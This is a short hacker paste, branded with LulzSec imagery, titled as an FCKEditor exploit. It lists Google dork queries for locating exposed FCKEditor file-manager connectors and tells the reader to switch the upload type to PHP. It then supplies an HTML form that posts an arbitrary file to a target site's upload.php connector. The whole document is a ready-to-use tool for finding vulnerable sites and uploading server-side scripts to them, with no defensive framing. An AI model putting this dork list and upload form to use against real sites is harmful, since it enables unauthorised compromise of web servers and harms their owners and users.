FCKEditor exploit ~Aya-chan

1. FCKEditor exploit ~Aya-chan
2.  
3. Dork:
4. inurl:/uploadtest.html
5. inurl:/fckeditor/editor/filemanager/browser/default/connectors/
6.  
7. Change upload type into: PHP
8. enctype="text/plain"
9.  
10. HTML sample form exploit:
11. -----------------------------------------------------------------------------------------------------------
12. <!--
13. Removing my name doesn't mean you discover/created this. ~ Aya-chan
14. -->
15. <head>
16. <title>FCKEditor Upload Exploit</title>
17. <style>
18. body {
19. background-image: url('http://boingboing.net/images/lulzsecp.jpg');
20. background-repeat: no-repeat;
21. background-size:cover;
22. }
23. </style>
24. </head>
25. <body bgColor="black">
26. <br/><br/>
27. <center>
28. <img src="https://upload.wikimedia.org/wikipedia/en/thumb/7/7c/Lulz_Security.svg/903px-Lulz_Security.svg.png" width="300" alt="LulzSec"/><br/>
29. <font color="black" size="+2" face="impact"> Fckeditor Upload Exploit [<font color="yellow" size="+2" face="impact">~Aya-chan</font>] </font>
30. <form enctype="multipart/form-data" action="http://siteadi/editor/filemanager/connectors/php/upload.php?Type=Media" method="post">
31. <input style="font-color: white; font-face: verdana; font-size: 20px; background-color: gray;" name="NewFile" type="file"></input>
32. <input style="font-color: white; font-face: verdana; font-size: 20px; background-color: blue;" type="submit" value="Upload"></input>
33. </form>
34. </center>
35. </body>
36. </html>